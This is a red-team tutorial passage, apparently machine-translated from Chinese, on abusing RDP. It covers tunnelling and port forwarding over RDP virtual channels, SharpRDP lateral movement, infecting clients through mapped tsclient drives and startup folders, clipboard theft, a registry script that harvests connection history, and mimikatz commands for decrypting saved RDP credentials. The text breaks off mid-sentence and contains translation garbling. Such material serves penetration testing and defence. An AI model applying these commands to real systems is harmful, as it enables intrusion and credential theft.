红蓝对抗中 RDP 协议的利用

1 SocksOverRDP

1.1 工具介绍

When the firewall rule is configured to: only the tcp/udp 3389 port can communicate, the Socks channel can be established using the RDP protocol. The application scenarios are relatively extreme.

Tool address: https://github.com/nccgroup/SocksOverRDP

This tool implements the Socks proxy function based on the RDP protocol. Just like the -D parameter of SSH, after connection, the proxy function is implemented using the RDP protocol.

The tool consists of two parts:

.dll, needs to be registered on the client and loaded into the context run environment of the remote desktop client at each run.

.exe, which is a server-side component that needs to be copied to the server and executed. No installation required, no configuration required.

When .exe is executed on the server side of the remote desktop connection, it connects back to the client through a dynamic virtual channel (a feature of the RDP protocol) and starts the SOCKS proxy on the client. This proxy listens on 127.0.0.1:1080 by default, and can be configured as a proxy in a browser or tool.

information

Programs on the server do not require any special privileges on the server side, and also allow low-privileged users to open virtual channels and proxies over connections.

1.2 工具测试

1.2.1 客户端

.dll needs to be placed in any directory on the client computer. For ease of use, the file can be copied to the %SYSROOT%\system32\ or %SYSROOT%\SysWoW64\ environment variable.

Use the following command to install and register the DLL:

regsvr32.exe SocksOverRDP-Plugin.dll

Unregister:

regsvr32.exe /u SocksOverRDP-Plugin.dll

When starting mstsc.exe in the RDP Client, you can see the following prompt:

1.2.2 服务端

Direct execution: SocksOverRDP-Server.exe

2 RDP to TCP

The usage scenario is still: Due to the firewall settings, you can only connect to the remote desktop of one Windows server. So how to use this Windows server as a springboard to enter the intranet

2.1 工具介绍

Tool address: https://github.com/V-E-O/rdp2tcp

Tool Principle: Use RDP virtual channel function to multiplex ports

Available features:

Forward TCP port forwarding

Reverse TCP port forwarding

Processing standard input/output forwarding

SOCKS5 Agent

2.2 工具测试

2.2.1 下载并编译rdp2tcp

Install mingw-w64

apt-get install mingw-w64

Download rdp2tcp

git clone https://github.com/V-E-O/rdp2tcp.git

Modify the configuration file

rdp2tcp does not support compiling 64-bit exe by default, so you need to modify the configuration file here and add configuration information for compiling 64-bit exe

Modify the file Makefile, the new content is as follows:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

all: client server-mingw64

client: client/rdp2tcp

client/rdp2tcp:

make -C client

#server-mingw32: server/rdp2tcp.exe

#server/rdp2tcp.exe:

#make -C server -f Makefile.mingw32

server-mingw64: server/rdp2tcp64.exe

server/rdp2tcp64.exe:

make -C server -f Makefile.mingw64

clean:

make -C client clean

#make -C server -f Makefile.mingw32 clean

make -C server -f Makefile.mingw64 clean

make -C tools clean

Create a new file /server/Makefile.mingw64, with the following content:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

26

27

28

29

30

31

BIN=rdp2tcp64.exe

CC=i686-w64-mingw32-gcc

CFLAGS=-Wall -g \

-D_WIN32_WINNT=0x0501 \

-I./common

# -D_WIN32_WINNT=0x0501

# -D_WIN32_WINNT=0x0501 -DDEBUG

LDFLAGS=-lwtsapi32 -lws2_32

OBJS=./common/iobuf.o \

./common/print.o \

./common/msgparser.o \

./common/nethelper.o \

./common/netaddr.o \

errors.o aio.o events.o \

tunnel.o channel.o process.o commands.o main.o

all: clean_common $(BIN)

clean_common:

$(MAKE) -C ./common clean

$(BIN): $(OBJS)

$(CC) -o $@ $(OBJS) $(LDFLAGS)

%.o: %.c

$(CC) $(CFLAGS) -o $@ -c $

clean:

rm -f $(OBJS) $(BIN)

Compilation

Make

2.2.2 使用 xfreerdp 连接远程桌面并建立通道

Execute xfreerdp and enable TCP redirection function

/opt/freerdp-nightly/bin/xfreerdp /v:IP:3389 /u:user /p:passwd /cert-ignore /rdp2tcp:/root/rdp2tcp/client/rdp2tcp2tcp

Upload rdp2tcp64.exe to RDP Server and execute (no administrator permission required)

Start rdp2tcp.py on the client system

cd rdp2tcp/tools

python rdp2tcp.py

The command to add forward port (local 445 - 192.168.112.129:445) is as follows:

python rdp2tcp.py add forward 127.0.0.1 445 192.168.112.129 445

3 利用 RDP 横向移动

3.1 测试

This section describes how to move horizontally based on the RDP protocol without going through the GUI client and the Socks proxy.

The mstscax.dll library under Windows can perform any RDP function, and this DLL is the ActiveX COM library for Microsoft Terminal Services. By leveraging this DLL, testers can create a console application that executes authenticated remote commands via RDP without the need for a GUI client or SOCKS proxy.

Execute in Cobalt Strike:

Execute the command directly:

SharpRDP.exe computername=dc01 command=calc username=offense\administrator password=123456

There are two authentication methods, one is to provide plain text credentials (as above), and the other is to use the current user context using a restricted management model. Restricted management mode is a Windows protection mechanism that requires network type login rather than interactive login, i.e. PTH.

3.2 场景

Sometimes in some cases, RDP is the preferred method for performing lateral mobility techniques, but using the traditional RDP client GUI can be difficult. Therefore, the above method can be used to hide the command execution process in the RDP protocol.

Secondly, you can use RDP to move horizontally without the system local management privileges but with RDP permissions on the system, and you can use BloodHound to collect information.

4 RDP 挂盘反打

Use disk monitoring + inject startup items to attack

4.1 原理

tsclient is a machine name that appears in the remote computer "Online Neighbor" when connecting to a remote computer through a remote desktop, and the name that is actually assigned to the remote computer to the local machine.

This machine can be accessed on a remote computer through the \\tsclient\ drive letter. Its access method is similar to using smb for file transfer. Although it is essentially the smb protocol, using tsclient does not require identity authentication, so you can directly reverse infection using tsclient through prefabricated means.

4.2 利用

Generally speaking, the idea of using tsclient is relatively simple. It writes malicious program scripts to the user's startup folder through file transfer. When the machine restarts, malicious program scripts will be executed.

Tools: https://github.com/mdsecactivebreach/RDPInception/

4.3 限制条件

mstsc requires the drive C drive, but by default mstsc does not enable disk sharing. It must be turned on manually, as shown in the figure:

When RDP remote access is enabled, only remote logged in users can access tsclient. Other users are inaccessible, including runas.

Although there are many restrictions, in actual environment, many operation and maintenance personnel usually mount disks for convenience of operation. Therefore, this method is not completely useless and needs to be judged based on actual conditions. A more rude idea: If the script cannot find the mounted disk, end the rdpclip.exe directly, which makes the administrator unable to use the clipboard function, forcing the administrator to directly remount the disk operation without knowing the reason.

Finally, unlike smb that uses the scheduled task to start after uploading the file, since the infected machine user is not known, it can only be started by relying on the startup item. Therefore, this attack method has weaker effect on server attacks.

5 剪切板利用方法

In addition to using file transfer, you can actually try to use clipboard hijacking to perform reverse attacks.

5.1 剪切板窃取

5.1.1 原理

When using mstsc for remote desktop, a process called rdpclip.exe will be started. The function of this process is to synchronize the clipboards of the server and the client.

This process is a very useful process. As mentioned above, if the process is directly terminated, when some data is copied to the client (local machine) on the server (remote machine), you will find that the clipboard is invalid and cannot be copied.

Since the clipboard contents are automatically synchronized when the process is started, when the target machine and other machines use mstsc to establish a remote RDP connection, you can perform clipboard stealing by reading the rdplicp.exe process data to obtain as much information as possible.

In addition, since the process is run in the background, when the administrator logs to multiple servers with remote desktop at the same time and performs copying and copying operations on one of the servers, the data will be synchronized to the rdplicp.exe process of all servers.

5.1.2 利用

There is a Get-ClipboardContents.ps1 in empire, which can be loaded with empire or coallt strike. Or you can write related scripts yourself. It is a relatively simple tool.

However, it should be noted that, similar to tsclient, it is impossible to read between different users of the same computer, and the rdplicp.exe of each user is started independently.

5.2 剪切板传输恶意文件

When we log in to a server with mstsc and press the copy operation on the server, a series of operations will be generated.

5.2.1 原理

When using a remote desktop, the process of using a clipboard to transfer a file is as follows:

1. On the server, the "Copy" operation will create clipboard data in the format "CF_HDROP"

2. When "paste" is executed on the client computer, a series of events will be triggered.

3. Require the rdpclip.exe process on the server to provide the contents of the clipboard and convert it to FileGroupDescriptor(Fgd) clipboard format

4. Use the HdropToFgdConverter:AddItemToFgd() function to add the metadata of the file to the descriptor

5. After completion, send the Fgd Blob to the RDP service on the server

6. The server just wraps it and sends it to the client

7. The client unpacks it and stores it in its own clipboard

8. The "Paste" event will be sent to the current window (for example, explorer.exe)

9. Process events and read data from the clipboard

10. Receive the content of the file through RDP connection

5.2.2 利用

https://github.com/qianshuidewajueji/CVE-2019-0887

https://github.com/0xedh/mstsc-path-traversal

6 RDP Thief

Each time you successfully connect to a remote host, the RDP client saves the name (or IP address) of the remote host and the username used to log in. When you start mstsc.exe again, you can directly select the name of the remote RDP server from the list, and the client has automatically filled in the username used to log in.

6.1 获取连接历史记录

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

26

27

28

29

30

31

32

33

34

35

36

#

.SYNOPSIS

This script will list the logged-in users' RDP Connections History.

#

$AllUser=Get-WmiObject -Class Win32_UserAccount

foreach($User in $AllUser)

{

$RegPath='Registry:HKEY_USERS\'+$User.SID+'\Software\Microsoft\Terminal Server Client\Servers\'

Write-Host 'User:'$User.Name

Write-Host 'SID:'$User.SID

Write-Host 'Status:'$User.Status

Try

{

$QueryPath=dir $RegPath -Name -ErrorAction Stop

}

Catch

{

Write-Host 'No RDP Connections History'

Write-Host '----------------------------------'

Continue continue

}

foreach($Name in $QueryPath)

{

Try

{

$User=(Get-ItemProperty -Path $RegPath$Name -ErrorAction Stop).UsernameHint

Write-Host 'User:'$User

Write-Host 'Server:'$Name

}

Catch

{

Write-Host 'No RDP Connections History'

}

}

Write-Host '----------------------------------'

}

6.2 破解 RDP 连接凭证

The prerequisite for cracking RDP connection credentials is that the user checks Save the credentials when connecting to the remote host.

Find local Credentials

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

Use mimikatz to do it

mimikatz dpapi:cred /in:C:\Users\by\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

**BLOB**

dwVersion : 00000001 - 1

guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}

dwMasterKeyVersion : 00000001 - 1

guidMasterKey : {ffc994a1-de8d-4304-9416-31e587f7a8ca}

dwFlags : 20000000 - 536870912 (system ; )

dwDescriptionLen : 00000030 - 48

szDescription : Local Credential Data

algCrypt : 00006610 - 26128 (CALG_AES_256)

dwAlgCryptLen : 00000100 - 256

dwSaltLen : 00000020 - 32

pbSalt : 00fed8ca7ec6d44585dd1fbd8b57e77b6ab0cf318ec5d52d09fd0694ffb89ccb

dwHmacKeyLen : 00000000 - 0

pbHmackKey :

algHash : 0000800e - 32782 (CALG_SHA_512)

dwAlgHashLen : 00000200 - 512

dwHmac2KeyLen : 00000020 - 32

pbHmack2Key : b49ef55f909fa503eda37ddc797c83c99df983920bfb4628e07aac5cb32bb530

dwDataLen : 000000b0 - 176

pbData : 4083f8f501b999a35c4aa57ce732bf52d30a6e604dac5a91b6fd3e65660c52a536025c5126f0d12b85044498deef08a8688b3459f49514ed6ae46271a1cb4cd0e70845d9b6beccbcbe85dead0fb7c80b4f7810add87b75c4 8592fcbfbbfd94fa4eee8004f8cf6d9619ef4b9af643f4c9ef0e8a2a5b0cd00530a5638cfd114fee4b735ac12eef2c7e6a0364845eb0ee4b3ab121e33324f8d5af48f3422bd47a76ab5e9e9e5a1a383e22fff8bf851b6a2a

dwSignLen : 00000040 - 64

pbSign : 7c8dbe7991c6af4d3bfc9f808790a0904738d0ca227bc2ee20ee26cbf06487dd2679e932b27ea0c0cbbe590ee6430641605d7001b2158c8873c5d6a09a9855a8

The next thing you need to use is guidMasterKey and pbData data. pbData is the encrypted data of the credentials, and guidMasterKey is the GUID of the credentials

Use sekurlsa:dpapi

According to the target credentials GUID:{ffc994a1-de8d-4304-9416-31e587